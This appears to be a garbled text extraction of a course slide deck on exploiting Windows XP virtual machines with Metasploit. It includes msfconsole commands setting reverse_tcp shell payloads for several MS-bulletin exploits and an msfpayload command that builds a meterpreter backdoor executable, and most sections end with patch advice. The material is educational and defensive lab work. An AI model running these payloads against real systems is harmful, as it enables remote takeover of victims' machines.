Exploiting with Metasploi Exploiting with Metasploit - hacking

LOGOLOGOLOGOLOGO

Exploiting with MetasploiExploiting with MetasploiExploiting with MetasploiExploiting with Metasploit t t t ---- hacking windows xp hacking windows xp hacking windows xp hacking windows xp

Hui LiHui LiHui LiHui LiWei ChenWei ChenWei ChenWei Chen

Rachit MathurRachit MathurRachit MathurRachit MathurDarshan DarbariDarshan DarbariDarshan DarbariDarshan Darbari

wps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/moban

OutlineOutlineOutlineOutline

� A Serious Security IssueA Serious Security IssueA Serious Security IssueA Serious Security Issue� Metasploit Introduction Metasploit Introduction Metasploit Introduction Metasploit Introduction� Basic Terms Basic Terms Basic Terms Basic Terms� Metasploit DownloadingMetasploit DownloadingMetasploit DownloadingMetasploit Downloading� Metasploit Metasploit Metasploit Metasploit InstallationInstallationInstallationInstallation� Get Ready to ExploitGet Ready to ExploitGet Ready to ExploitGet Ready to Exploit� Metasploit Attacks Metasploit Attacks Metasploit Attacks Metasploit Attacks


A Serious Security IssueA Serious Security IssueA Serious Security IssueA Serious Security Issue

� Symantec blocked more than 5.5 5.5 5.5 5.5 billionbillionbillionbillion malicious attacks in 2011.

� Malicious attacks skyrocket by more than 81%81%81%81% compared with 2010.

� More than 222232.4 million32.4 million32.4 million32.4 million identities were exposed.

� Over 154154154154 targetted attacks took place per dayper dayper dayper day in Dec. 2011.

-- Symantec Internet Security Threat Report 2011 Trends


Metasploit IntroductionMetasploit IntroductionMetasploit IntroductionMetasploit Introduction

� Tool for developing & testing of Tool for developing & testing of Tool for developing & testing of Tool for developing & testing of Vulnerabilities.Vulnerabilities.Vulnerabilities.Vulnerabilities.

� Started by H.D Moore in 2003Started by H.D Moore in 2003Started by H.D Moore in 2003Started by H.D Moore in 2003

� Acquired by Rapid7Acquired by Rapid7Acquired by Rapid7Acquired by Rapid7

� Remains open source & free ofRemains open source & free ofRemains open source & free ofRemains open source & free of useuseuseuse

� Written in RubyWritten in RubyWritten in RubyWritten in Ruby


Basic TermsBasic TermsBasic TermsBasic Terms

� VulnerabilityVulnerabilityVulnerabilityVulnerability::::- Weakness which allows attacker to break into systems security.

� ExploitExploitExploitExploit::::- Code which allows an attacker to take advantage of a vulnerable system.

� Payload:Payload:Payload:Payload:- Actual code which runs on the system after exploitation.

wps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/mobanwps.cn/moban

Metasploit DownloadingMetasploit DownloadingMetasploit DownloadingMetasploit Downloading

�Metasploit supports Windows, Linux 32-bit and Linux 64-bit.

�The latest version (version 4.3 for now) is available on the following official website.http://www.metasploit.com/download/



� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Metasploit Metasploit Metasploit InstallationInstallationInstallationInstallation� Installation Metasploit on Windows� Installation Metasploit on Ubuntu (Linux)

� Get Ready to Exploit� Metasploit Attacks



� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Installation Metasploit on WindowsInstallation Metasploit on WindowsInstallation Metasploit on WindowsInstallation Metasploit on Windows� Installation Metasploit on Ubuntu (Linux)



Installing Metasploit on WindowsInstalling Metasploit on WindowsInstalling Metasploit on WindowsInstalling Metasploit on Windows

Disable

anti-virus softwares

and

firewalls







� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Installation Metasploit on Windows� Installation Metasploit on Ubuntu (Linux)Installation Metasploit on Ubuntu (Linux)Installation Metasploit on Ubuntu (Linux)Installation Metasploit on Ubuntu (Linux)



Installing Metasploit on Ubuntu (Linux)Installing Metasploit on Ubuntu (Linux)Installing Metasploit on Ubuntu (Linux)Installing Metasploit on Ubuntu (Linux)

Use command

sudo chmod +x metasploit-latest-linux-installer.run

to give permission to execute the file



Use command

sudo ./metasploit-latest-linux-installer.run

to execute the file


Company LogoCompany LogoCompany LogoCompany Logo


Use command

sudo ./metasploit-latest-linux-installer.run

to execute the file



� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to ExploitGet Ready to ExploitGet Ready to ExploitGet Ready to Exploit� Installing Virtual Machines� IP Configuration

� Metasploit Attacks



� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to Exploit� Installing Windows xp Virtual MachineInstalling Windows xp Virtual MachineInstalling Windows xp Virtual MachineInstalling Windows xp Virtual Machine� Installing Ubuntu Virtual Machine� IP Configuration



Installing Windows XP Virtual MachineInstalling Windows XP Virtual MachineInstalling Windows XP Virtual MachineInstalling Windows XP Virtual Machine

� Windows XP Mode with Virtual PC Windows XP Mode with Virtual PC Windows XP Mode with Virtual PC Windows XP Mode with Virtual PCIt can be downloaded from the following It can be downloaded from the following It can be downloaded from the following It can be downloaded from the following official website.official website.official website.official website.http://www.microsoft.com/windows/virtual-http://www.microsoft.com/windows/virtual-http://www.microsoft.com/windows/virtual-http://www.microsoft.com/windows/virtual-pc/download.aspxpc/download.aspxpc/download.aspxpc/download.aspx

�Windows XP with VMware PlayerWindows XP with VMware PlayerWindows XP with VMware PlayerWindows XP with VMware Player VMware Player is available on the VMware Player is available on the VMware Player is available on the VMware Player is available on the

following official website.following official website.following official website.following official website.http://www.vmware.com/products/player/ovehttp://www.vmware.com/products/player/ovehttp://www.vmware.com/products/player/ovehttp://www.vmware.com/products/player/overview.htmlrview.htmlrview.htmlrview.html









� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to Exploit� Installing Windows xp Virtual Machine� Installing Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual Machine� IP Configuration



Installing Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual Machine

Ubuntu with VMware PlayerUbuntu with VMware PlayerUbuntu with VMware PlayerUbuntu with VMware Player

� An Ubuntu 9 Virtual Machine file that An Ubuntu 9 Virtual Machine file that An Ubuntu 9 Virtual Machine file that An Ubuntu 9 Virtual Machine file that can run in VMware Player is available on can run in VMware Player is available on can run in VMware Player is available on can run in VMware Player is available on the following websitethe following websitethe following websitethe following websitehttp://128.230.208.57/SEEDUbuntu9_August_2http://128.230.208.57/SEEDUbuntu9_August_2http://128.230.208.57/SEEDUbuntu9_August_2http://128.230.208.57/SEEDUbuntu9_August_2010.tar.gz010.tar.gz010.tar.gz010.tar.gz

� TTTThe latest version of Ubuntu he latest version of Ubuntu he latest version of Ubuntu he latest version of Ubuntu installation installation installation installation files (.iso) which can be made to Virtural files (.iso) which can be made to Virtural files (.iso) which can be made to Virtural files (.iso) which can be made to Virtural Machine is on the following official Machine is on the following official Machine is on the following official Machine is on the following official websitewebsitewebsitewebsitehttp://www.ubuntu.com/download/desktophttp://www.ubuntu.com/download/desktophttp://www.ubuntu.com/download/desktophttp://www.ubuntu.com/download/desktop



Installing Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual MachineInstalling Ubuntu Virtual Machine



� A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to Exploit� Installing Windows xp Virtual Machine� Installing Ubuntu Virtual Machine� IP ConIP ConIP ConIP Confifififigurationgurationgurationguration



IP ConfigurationIP ConfigurationIP ConfigurationIP Configuration

Make sure that all machines used toMake sure that all machines used toMake sure that all machines used toMake sure that all machines used toperform exploits are in the sameperform exploits are in the sameperform exploits are in the sameperform exploits are in the samenetwork.network.network.network.

�Method 1: use network adapter Bridge Method 1: use network adapter Bridge Method 1: use network adapter Bridge Method 1: use network adapter Bridge setting setting setting setting

�Method 2: set IP, Subnet mask, Default Method 2: set IP, Subnet mask, Default Method 2: set IP, Subnet mask, Default Method 2: set IP, Subnet mask, Default gateway and DNS artificially gateway and DNS artificially gateway and DNS artificially gateway and DNS artificially









Set Set Set Set

Protocol (TCP/IP) PropertiesProtocol (TCP/IP) PropertiesProtocol (TCP/IP) PropertiesProtocol (TCP/IP) Properties

according to the host according to the host according to the host according to the host machinemachinemachinemachine



IP ConfigurationIP ConfigurationIP ConfigurationIP Configuration (check) (check) (check) (check)


OutlineOutlineOutlineOutline � A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to Exploit� Metasploit AttacksMetasploit AttacksMetasploit AttacksMetasploit Attacks

� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


OutlineOutlineOutlineOutline � A Serious Security Issue� Metasploit Introduction� Basic Terms� Metasploit Downloading� Metasploit Installation� Get Ready to Exploit� Metasploit Attacks

� MS08_067 MS08_067 MS08_067 MS08_067 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


MS08_067 MS08_067 MS08_067 MS08_067 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability Attack

Description:Description:Description:Description:This module exploits a parsing flaw in the pathThis module exploits a parsing flaw in the pathThis module exploits a parsing flaw in the pathThis module exploits a parsing flaw in the pathcanonicalization code of NetAPI32.dll through thecanonicalization code of NetAPI32.dll through thecanonicalization code of NetAPI32.dll through thecanonicalization code of NetAPI32.dll through theServer Service. This module is capable of bypassing NXServer Service. This module is capable of bypassing NXServer Service. This module is capable of bypassing NXServer Service. This module is capable of bypassing NXon some operating systems and service packs.on some operating systems and service packs.on some operating systems and service packs.on some operating systems and service packs.

Targets:Targets:Targets:Targets:Windows XPWindows XPWindows XPWindows XP

Objective:Objective:Objective:Objective:Use Use Use Use ms08_067_netapims08_067_netapims08_067_netapims08_067_netapi fromfromfromfrom Matesploit Matesploit Matesploit Matesploit on on on on aaaan ubuntu n ubuntu n ubuntu n ubuntu virtual virtual virtual virtual machine to attack a windowsmachine to attack a windowsmachine to attack a windowsmachine to attack a windows xpxpxpxp virtual machine.virtual machine.virtual machine.virtual machine.




Metasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:

� msf> set RHOST 192.168.1.33 msf> set RHOST 192.168.1.33 msf> set RHOST 192.168.1.33 msf> set RHOST 192.168.1.33

� msf> set payload msf> set payload msf> set payload msf> set payload windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp(Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)

� msf> set LHOST 192.168.1.43 msf> set LHOST 192.168.1.43 msf> set LHOST 192.168.1.43 msf> set LHOST 192.168.1.43








Prevention:Prevention:Prevention:Prevention:

Microsoft UpdateMicrosoft UpdateMicrosoft UpdateMicrosoft UpdateMS08_067MS08_067MS08_067MS08_067：Security Update for Security Update for Security Update for Security Update for Windows XP (KB958644)Windows XP (KB958644)Windows XP (KB958644)Windows XP (KB958644)(http://www.microsoft.com/en-us/download/confirmation.aspx?id=3205)



� MS08_067 Vulnerability Attack� Backdoor ExploitBackdoor ExploitBackdoor ExploitBackdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


Backdoor ExploitBackdoor ExploitBackdoor ExploitBackdoor ExploitDescription:Description:Description:Description:Use a backdoor Use a backdoor Use a backdoor Use a backdoor programprogramprogramprogram to attack system. to attack system. to attack system. to attack system.

Preparation:Preparation:Preparation:Preparation:� An ubuntu virtual machine ( An ubuntu virtual machine ( An ubuntu virtual machine ( An ubuntu virtual machine (seedseedseedseed) with Metasploit ) with Metasploit ) with Metasploit ) with Metasploit

installed on it.installed on it.installed on it.installed on it.� Another ubuntu virtual machine ( Another ubuntu virtual machine ( Another ubuntu virtual machine ( Another ubuntu virtual machine (harryharryharryharry) with ) with ) with ) with

Metasploit and Wine installed on it. (Wine will be used Metasploit and Wine installed on it. (Wine will be used Metasploit and Wine installed on it. (Wine will be used Metasploit and Wine installed on it. (Wine will be used to run the backdoor to run the backdoor to run the backdoor to run the backdoor programprogramprogramprogram.).).).)

ObjectiveObjectiveObjectiveObjective::::� Create a backdoor Create a backdoor Create a backdoor Create a backdoor programprogramprogramprogram on ubuntu VM on ubuntu VM on ubuntu VM on ubuntu VM harryharryharryharry, , , , withwithwithwith

specific configurations.specific configurations.specific configurations.specific configurations.� Use exploit Use exploit Use exploit Use exploit handlerhandlerhandlerhandler from Metasploit on ubuntu VM seed. from Metasploit on ubuntu VM seed. from Metasploit on ubuntu VM seed. from Metasploit on ubuntu VM seed.� Set options of Set options of Set options of Set options of handlerhandlerhandlerhandler according to the configurations according to the configurations according to the configurations according to the configurations

of the backdoor program, and exploit.of the backdoor program, and exploit.of the backdoor program, and exploit.of the backdoor program, and exploit.� Run the backdoor program on ubuntu VM harry. Run the backdoor program on ubuntu VM harry. Run the backdoor program on ubuntu VM harry. Run the backdoor program on ubuntu VM harry.� Ubuntu VM Ubuntu VM Ubuntu VM Ubuntu VM seedseedseedseed gets a session and VM harry is exploited. gets a session and VM harry is exploited. gets a session and VM harry is exploited. gets a session and VM harry is exploited.


Backdoor ExploitBackdoor ExploitBackdoor ExploitBackdoor ExploitCommands to creat backdoor programCommands to creat backdoor programCommands to creat backdoor programCommands to creat backdoor programwith certain configurations:with certain configurations:with certain configurations:with certain configurations:

ubuntu:~/Desktop$ sudo msfpayload ubuntu:~/Desktop$ sudo msfpayload ubuntu:~/Desktop$ sudo msfpayload ubuntu:~/Desktop$ sudo msfpayload windows/meterpreter/reverse_tcp windows/meterpreter/reverse_tcp windows/meterpreter/reverse_tcp windows/meterpreter/reverse_tcp LHOST=192.168.1.43 LPORT=4444 LHOST=192.168.1.43 LPORT=4444 LHOST=192.168.1.43 LPORT=4444 LHOST=192.168.1.43 LPORT=4444 x>harry.exex>harry.exex>harry.exex>harry.exe

� (Use windows payload because the backdoor (Use windows payload because the backdoor (Use windows payload because the backdoor (Use windows payload because the backdoor program will be run by Wine in ubuntu as a program will be run by Wine in ubuntu as a program will be run by Wine in ubuntu as a program will be run by Wine in ubuntu as a windows program, .exe file.)windows program, .exe file.)windows program, .exe file.)windows program, .exe file.)

� (Set LHOST and LPORT using the one that will be (Set LHOST and LPORT using the one that will be (Set LHOST and LPORT using the one that will be (Set LHOST and LPORT using the one that will be set to options of exploit on attacker's machine.)set to options of exploit on attacker's machine.)set to options of exploit on attacker's machine.)set to options of exploit on attacker's machine.)





Backdoor ExploitBackdoor ExploitBackdoor ExploitBackdoor Exploit

Metasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:msf> set payload windows/meterpreter/reverse_tcpmsf> set payload windows/meterpreter/reverse_tcpmsf> set payload windows/meterpreter/reverse_tcpmsf> set payload windows/meterpreter/reverse_tcp

msf> set LHOST 192.168.1.43msf> set LHOST 192.168.1.43msf> set LHOST 192.168.1.43msf> set LHOST 192.168.1.43

msf> set LPORT 4444msf> set LPORT 4444msf> set LPORT 4444msf> set LPORT 4444

(Like the backdoor program was configured.)(Like the backdoor program was configured.)(Like the backdoor program was configured.)(Like the backdoor program was configured.)



� Start the payload handler on VM Start the payload handler on VM Start the payload handler on VM Start the payload handler on VM seed.seed.seed.seed.

� Then run the backdoor program on Then run the backdoor program on Then run the backdoor program on Then run the backdoor program on VM harry.VM harry.VM harry.VM harry.


As the backdoor was run on VM As the backdoor was run on VM As the backdoor was run on VM As the backdoor was run on VM harry, VM seed gets a session and harry, VM seed gets a session and harry, VM seed gets a session and harry, VM seed gets a session and VM harry is exploited.VM harry is exploited.VM harry is exploited.VM harry is exploited.




Backdoor ExploitBackdoor ExploitBackdoor ExploitBackdoor ExploitPrevention:Prevention:Prevention:Prevention:

Avoid program with malicious Avoid program with malicious Avoid program with malicious Avoid program with malicious backdoors.backdoors.backdoors.backdoors.



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


MS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackDescription:Description:Description:Description:This module exploits a use-after-free vulnerability within theThis module exploits a use-after-free vulnerability within theThis module exploits a use-after-free vulnerability within theThis module exploits a use-after-free vulnerability within theDHTMLDHTMLDHTMLDHTML behaviors functionality of Microsoft Internet Explorerbehaviors functionality of Microsoft Internet Explorerbehaviors functionality of Microsoft Internet Explorerbehaviors functionality of Microsoft Internet Explorerversion 6 and 7.version 6 and 7.version 6 and 7.version 6 and 7.(Internet Explorer 8 and Internet Explorer 5 are not affected.)(Internet Explorer 8 and Internet Explorer 5 are not affected.)(Internet Explorer 8 and Internet Explorer 5 are not affected.)(Internet Explorer 8 and Internet Explorer 5 are not affected.)

Available Targets:Available Targets:Available Targets:Available Targets:� IE6, IE7 on Windows NT, 2000, XP, 2003 and VistaIE6, IE7 on Windows NT, 2000, XP, 2003 and VistaIE6, IE7 on Windows NT, 2000, XP, 2003 and VistaIE6, IE7 on Windows NT, 2000, XP, 2003 and Vista� IE 6 SP0-SP2 IE 6 SP0-SP2 IE 6 SP0-SP2 IE 6 SP0-SP2� IE 7.0IE 7.0IE 7.0IE 7.0

ObjectiveObjectiveObjectiveObjective::::Use Use Use Use an an an an IE VulnerabilityIE VulnerabilityIE VulnerabilityIE Vulnerability ms10_018_ie_behaviorsms10_018_ie_behaviorsms10_018_ie_behaviorsms10_018_ie_behaviors fromfromfromfromMatesploit Matesploit Matesploit Matesploit on on on on aaaa windows 7 machine to attack a windows xpwindows 7 machine to attack a windows xpwindows 7 machine to attack a windows xpwindows 7 machine to attack a windows xpvirtual machine.virtual machine.virtual machine.virtual machine.




MS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMetasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:� msf> msf> msf> msf> set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14

� msf> msf> msf> msf> set payloadset payloadset payloadset payload windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp(Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)

� msf> msf> msf> msf> set LHOST 192.168.1.14set LHOST 192.168.1.14set LHOST 192.168.1.14set LHOST 192.168.1.14







MS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMetasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:� msf> msf> msf> msf> sessionssessionssessionssessions(see how many sessions was (see how many sessions was (see how many sessions was (see how many sessions was

obtained from the attack and what obtained from the attack and what obtained from the attack and what obtained from the attack and what was each session about.)was each session about.)was each session about.)was each session about.)

� msf> msf> msf> msf> sessions -i [id of the session]sessions -i [id of the session]sessions -i [id of the session]sessions -i [id of the session](use the session to get the shell.)(use the session to get the shell.)(use the session to get the shell.)(use the session to get the shell.)






MS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackMS10_018 IE Vulnerability AttackPrevention:Prevention:Prevention:Prevention:

Microsoft UpdateMicrosoft UpdateMicrosoft UpdateMicrosoft UpdateMS10-018MS10-018MS10-018MS10-018：Cumulative Security Cumulative Security Cumulative Security Cumulative Security Update for Internet Explorer Update for Internet Explorer Update for Internet Explorer Update for Internet Explorer (980182)(980182)(980182)(980182)(http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true)



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 MS10_046 MS10_046 MS10_046 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


MS10_046 MS10_046 MS10_046 MS10_046 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability AttackDescription:Description:Description:Description:This module exploits a vulnerability in theThis module exploits a vulnerability in theThis module exploits a vulnerability in theThis module exploits a vulnerability in thehandling of Windowshandling of Windowshandling of Windowshandling of Windows Shortcut files that containShortcut files that containShortcut files that containShortcut files that containan icon resource pointing to a maliciousan icon resource pointing to a maliciousan icon resource pointing to a maliciousan icon resource pointing to a malicious DLL.DLL.DLL.DLL.ThThThTheeee module creates a WebDAV service that can module creates a WebDAV service that can module creates a WebDAV service that can module creates a WebDAV service that canbe used to runbe used to runbe used to runbe used to run an arbitrary payload whenan arbitrary payload whenan arbitrary payload whenan arbitrary payload whenaccessed as a UNC path.accessed as a UNC path.accessed as a UNC path.accessed as a UNC path.

ObjectiveObjectiveObjectiveObjective::::Use Use Use Use a LNK shortcut auto-runa LNK shortcut auto-runa LNK shortcut auto-runa LNK shortcut auto-run VulnerabilityVulnerabilityVulnerabilityVulnerabilityms10_0ms10_0ms10_0ms10_046464646____shortcutshortcutshortcutshortcut____icon_dllloadericon_dllloadericon_dllloadericon_dllloaderfrom Matesploit on a windowsfrom Matesploit on a windowsfrom Matesploit on a windowsfrom Matesploit on a windows 7 machine to7 machine to7 machine to7 machine toattack a windows xp virtual machine.attack a windows xp virtual machine.attack a windows xp virtual machine.attack a windows xp virtual machine.




MS10_046 MS10_046 MS10_046 MS10_046 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability AttackMetasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:

� msf> msf> msf> msf> set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14

� msf> msf> msf> msf> set payload set payload set payload set payload windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp(Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form (Set payload so that a cmd shell form viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)viticm's machine will be obtained.)

� msf> msf> msf> msf> set LHOST 192.168.1.14set LHOST 192.168.1.14set LHOST 192.168.1.14set LHOST 192.168.1.14







MS10_046 MS10_046 MS10_046 MS10_046 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability AttackMetasploit Commands:Metasploit Commands:Metasploit Commands:Metasploit Commands:

� msf> msf> msf> msf> sessionssessionssessionssessions(see how many sessions was(see how many sessions was(see how many sessions was(see how many sessions was obtained from the attack and what obtained from the attack and what obtained from the attack and what obtained from the attack and what was each session about.)was each session about.)was each session about.)was each session about.)

� msf> msf> msf> msf> sessions -i [id of the session]sessions -i [id of the session]sessions -i [id of the session]sessions -i [id of the session](use the session to get the shell.)(use the session to get the shell.)(use the session to get the shell.)(use the session to get the shell.)



MS10_046 MS10_046 MS10_046 MS10_046 Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability AttackPrevention:Prevention:Prevention:Prevention:

Microsoft UpdateMicrosoft UpdateMicrosoft UpdateMicrosoft UpdateMS10-046MS10-046MS10-046MS10-046：Vulnerability in Windows Vulnerability in Windows Vulnerability in Windows Vulnerability in Windows Shell Could Allow Remote Code Shell Could Allow Remote Code Shell Could Allow Remote Code Shell Could Allow Remote Code Execution (2286198)Execution (2286198)Execution (2286198)Execution (2286198)(http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx?pf=true)



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora MS10_002_aurora MS10_002_aurora MS10_002_aurora Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability Attack� Talkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


MS10_002_aurora MS10_002_aurora MS10_002_aurora MS10_002_aurora Vulnerability AttackVulnerability AttackVulnerability AttackVulnerability Attack

Description:Description:Description:Description:This module exploits a memory corruptionThis module exploits a memory corruptionThis module exploits a memory corruptionThis module exploits a memory corruptionflaw in Internet Explorer. This flaw wasflaw in Internet Explorer. This flaw wasflaw in Internet Explorer. This flaw wasflaw in Internet Explorer. This flaw wasfound in the wild and was a key componentfound in the wild and was a key componentfound in the wild and was a key componentfound in the wild and was a key componentof the "Operation Aurora" attacks that leadof the "Operation Aurora" attacks that leadof the "Operation Aurora" attacks that leadof the "Operation Aurora" attacks that leadto the compromise of a number of highto the compromise of a number of highto the compromise of a number of highto the compromise of a number of highprofile companies. profile companies. profile companies. profile companies.

Objective:Objective:Objective:Objective:Use Use Use Use MS10_002_aurora exploit MS10_002_aurora exploit MS10_002_aurora exploit MS10_002_aurora exploit from Matesploitfrom Matesploitfrom Matesploitfrom Matesploiton a windowson a windowson a windowson a windows 7 machine to7 machine to7 machine to7 machine to attack a windows xpattack a windows xpattack a windows xpattack a windows xpvirtual machine.virtual machine.virtual machine.virtual machine.




Metasploit CommandsMetasploit CommandsMetasploit CommandsMetasploit Commands::::

� msfmsfmsfmsf>>>> set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14set SRVHOST 192.168.1.14

� msf> set payload msf> set payload msf> set payload msf> set payload windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp

� msf> set LHOST 192.168.1.14 msf> set LHOST 192.168.1.14 msf> set LHOST 192.168.1.14 msf> set LHOST 192.168.1.14






Prevention:Prevention:Prevention:Prevention:

Update Internet Explorer to a Update Internet Explorer to a Update Internet Explorer to a Update Internet Explorer to a higher version such as IE7 or IE8.higher version such as IE7 or IE8.higher version such as IE7 or IE8.higher version such as IE7 or IE8.



� MS08_067 Vulnerability Attack� Backdoor Exploit� MS10_018 IE Vulnerability Attack� MS10_046 Vulnerability Attack� MS10_002_aurora Vulnerability Attack� Talkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response Attack� NAT Helper DOS Attack� Reverse Shell Attack� SQL Server Generic Exploit


Talkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response Attack� DescriptionDescriptionDescriptionDescription� Talkative IRC suffers from a stack based buffer overflow

vulnerability that enables us to gain full control over the application and execute arbitrary commands.

� ECX and EIP registers gets overwritten, so does the SEH.

� TargetsTargetsTargetsTargets� Windows XP SP3 English (default)

� ObjectiveObjectiveObjectiveObjective� Exploit the buffer overflow vulnerability issue by tempting a

user into connecting to a malicious IRC server.


Talkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response AttackTalkative IRC Response Attack� CommandsCommandsCommandsCommands� msf exploit(talkative_response) >use msf exploit(talkative_response) >use msf exploit(talkative_response) >use msf exploit(talkative_response) >use

exploit/windows/misc/talkative_responseexploit/windows/misc/talkative_responseexploit/windows/misc/talkative_responseexploit/windows/misc/talkative_response� msf exploit(talkative_response) > set payload msf exploit(talkative_response) > set payload msf exploit(talkative_response) > set payload msf exploit(talkative_response) > set payload

windows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcpwindows/shell/reverse_tcp� msf exploit(talkative_response) > set SRVHOST 129.63.226.105msf exploit(talkative_response) > set SRVHOST 129.63.226.105msf exploit(talkative_response) > set SRVHOST 129.63.226.105msf exploit(talkative_response) > set SRVHOST 129.63.226.105� msf exploit(talkative_response) > set LPORT 4444msf exploit(talkative_response) > set LPORT 4444msf exploit(talkative_response) > set LPORT 4444msf exploit(talkative_response) > set LPORT 4444� msf exploit(talkative_response) > set LHOST 129.63.226.105msf exploit(talkative_response) > set LHOST 129.63.226.105msf exploit(talkative_response) > set LHOST 129.63.226.105msf exploit(talkative_response) > set LHOST 129.63.226.105� msf exploit(talkative_response) > exploitmsf exploit(talkative_response) > exploitmsf exploit(talkative_response) > exploitmsf exploit(talkative_response) > exploit� Open the browser in the victims machine and enter the URL as Open the browser in the victims machine and enter the URL as Open the browser in the victims machine and enter the URL as Open the browser in the victims machine and enter the URL as

http://129.63.226.105:4444http://129.63.226.105:4444http://129.63.226.105:4444http://129.63.226.105:4444 (malicious link to attackers server) (malicious link to attackers server) (malicious link to attackers server) (malicious link to attackers server)� On the attacker machine we get a session along with an id which is On the attacker machine we get a session along with an id which is On the attacker machine we get a session along with an id which is On the attacker machine we get a session along with an id which is

the victims session. Enter CTRL+c on the attackers metasploit the victims session. Enter CTRL+c on the attackers metasploit the victims session. Enter CTRL+c on the attackers metasploit the victims session. Enter CTRL+c on the attackers metasploit console and type the command console and type the command console and type the command console and type the command

� msf exploit(talkative_response) > sessions -i <session msf exploit(talkative_response) > sessions -i <session msf exploit(talkative_response) > sessions -i <session msf exploit(talkative_response) > sessions -i <session id_number>id_number>id_number>id_number>

